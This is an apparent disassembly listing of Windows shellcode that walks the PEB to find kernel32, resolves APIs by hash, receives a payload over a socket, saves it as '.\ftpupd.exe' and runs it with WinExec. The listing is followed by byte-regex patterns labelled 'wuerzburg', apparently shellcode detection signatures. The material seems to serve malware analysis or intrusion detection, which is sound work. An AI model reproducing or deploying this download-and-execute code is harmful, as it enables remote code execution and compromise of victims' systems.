000001EF ; ---------------------------------------------------------------------------
000001EF add esp, 40h
000001F2 or eax, eax
000001F4 jnz loc_2A7
000001FA push 4
000001FC push 1000h
00000201 push 10000h
00000206 push 0
00000208 call CallProcKernel32
00000208 ; ---------------------------------------------------------------------------
0000020D dd 697A6AFEh ; VirtualAlloc
00000211 ; ---------------------------------------------------------------------------
00000211 mov [ebp+17Ch], eax
00000217 push 0
00000219 push 10000h
0000021E push eax
0000021F push dword ptr [ebp+184h]
00000225 call CallProcWS2_32
00000225 ; ---------------------------------------------------------------------------
0000022A dd 0E5971F6h ; recv
0000022E ; ---------------------------------------------------------------------------
0000022E push eax
0000022F push 2
00000231 push dword ptr [ebp+184h]
00000237 call CallProcWS2_32
00000237 ; ---------------------------------------------------------------------------
0000023C dd 4C7C5841h ; shutdown
00000240 ; ---------------------------------------------------------------------------
00000240 sub eax, eax
00000242 push eax
00000243 push eax
00000244 push 2
00000246 push eax
00000247 push eax
00000248 push 40000000h
0000024D lea ebx, [ebp+16Fh]
00000253 push ebx
00000254 call CallProcKernel32
00000254 ; ---------------------------------------------------------------------------
00000259 dd 8F8F114h ; CreateFileA
0000025D ; ---------------------------------------------------------------------------
0000025D mov [ebp+16Bh], eax
00000263 pop edx
00000264 cmp eax, 0FFFFFFFFh
00000267 jz short loc_2A7
00000269 push esp
0000026A mov eax, esp
0000026C push 0
0000026E push eax
0000026F push edx
00000270 push dword ptr [ebp+17Ch]
00000276 push dword ptr [ebp+16Bh]
0000027C call CallProcKernel32
0000027C ; ---------------------------------------------------------------------------
00000281 dd 0F3FD1C3h ; WriteFile
00000285 ; ---------------------------------------------------------------------------
00000285 pop ecx
00000286 push dword ptr [ebp+16Bh]
0000028C call CallProcKernel32
0000028C ; ---------------------------------------------------------------------------
00000291 dd 723EB0D5h ; CloseHandle
00000295 ; ---------------------------------------------------------------------------
00000295 push 5
00000297 lea ebx, [ebp+16Fh]
0000029D push ebx
0000029E call CallProcKernel32
0000029E ; ---------------------------------------------------------------------------
000002A3 dd 0E8BF6DADh ; WinExec
000002A7 ; ---------------------------------------------------------------------------
000002A7
000002A7 loc_2A7:
000002A7 push 0
000002A9 call CallProcKernel32
000002A9 ; ---------------------------------------------------------------------------
000002AE dd 768AA260h ; ExitThread
000002B2 aU9 db 'u9',0
000002B5 db 0
000002B6 db 0
000002B7 db 0
000002B8 db 0
000002B9 a_Ftpupd_exe db '.\ftpupd.exe',0
000002C6 db 0
000002C7 db 0
000002C8 db 0
000002C9 db 0
000002CA db 0
000002CB db 0
000002CC db 0
000002CD db 0
000002CE db 0
000002CF db 0
000002D0 db 0
000002D1 db 0
000002D2 aSleep db 'Sleep',0
000002D8 aKernel32 db 'kernel32',0
000002E1
000002E1 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
000002E1
000002E1
000002E1 CallProcWS2_32 proc near
000002E1 pop esi
000002E2 lodsd
000002E3 pusha
000002E4 xor eax, eax
000002E6 sub eax, 87FFB3B4h
000002EB push eax
000002EC xor eax, 3C2E7E7Fh
000002F1 push eax
000002F2 add eax, 1B042124h
000002F7 push eax
000002F8 push esp
000002F9 call CallProcKernel32
000002F9 ; ---------------------------------------------------------------------------
000002FE dword_2FE dd 0C8AC8026h
00000302 ; ---------------------------------------------------------------------------
00000302 lea esp, [esp+0Ch]
00000306 xchg eax, ebx
00000307 jmp short loc_311
00000307 CallProcWS2_32 endp
00000307
00000309
00000309 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
00000309
00000309
00000309 CallProcKernel32 proc near
00000309 pop esi
0000030A lodsd
0000030B pusha
0000030C call GetKernel32Base
00000311
00000311 loc_311:
00000311 mov ecx, [ebx+3Ch]
00000314 mov ecx, [ecx+ebx+78h]
00000318 add ecx, ebx
0000031A xor esi, esi
0000031C
0000031C loc_31C:
0000031C lea edx, [ebx+esi*4]
0000031F add edx, [ecx+20h]
00000322 mov edx, [edx]
00000324 add edx, ebx
00000326 xor eax, eax
00000328
00000328 loc_328:
00000328 rol eax, 7
0000032B xor al, [edx]
0000032D inc edx
0000032E cmp byte ptr [edx], 0
00000331 jnz short loc_328
00000333 cmp eax, [esp+1Ch]
00000337 jz short loc_340
00000339 inc esi
0000033A cmp esi, [ecx+18h]
0000033D jb short loc_31C
0000033F int 3 ; Trap to Debugger
00000340
00000340 loc_340:
00000340 mov edx, [ecx+24h]
00000343 add edx, ebx
00000345 movzx edx, word ptr [edx+esi*2]
00000349 mov eax, [ecx+1Ch]
0000034C add eax, ebx
0000034E mov eax, [eax+edx*4]
00000351 add eax, ebx
00000353 mov [esp+1Ch], eax
00000357 popa
00000358 mov [ebp+180h], eax
0000035E call eax
00000360 jmp esi
00000360 CallProcKernel32 endp
00000360
00000362
00000362 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
00000362
00000362
00000362 GetKernel32Base proc near
00000362 mov ebx, fs:30h
00000368 mov ebx, [ebx+0Ch]
0000036B mov ebx, [ebx+1Ch]
0000036E mov ebx, [ebx]
00000370 mov ebx, [ebx+8]
00000373 retn
00000373 GetKernel32Base endp
00000373
shellcode patterns
wuerzburg
"\\xEB\\x27(..)(....)\\x5D\\x33\\xC9\\x66\\xB9..\\x8D"
"\\x75\\x05\\x8B\\xFE\\x8A\\x06\\x3C.\\x75\\x05"
"\\x46\\x8A\\x06\\x2C.\\x46\\x34.\\x88\\x07"
"\\x47\\xE2\\xED\\xEB\\x0A\\xE8\\xDA\\xFF\\xFF\\xFF";
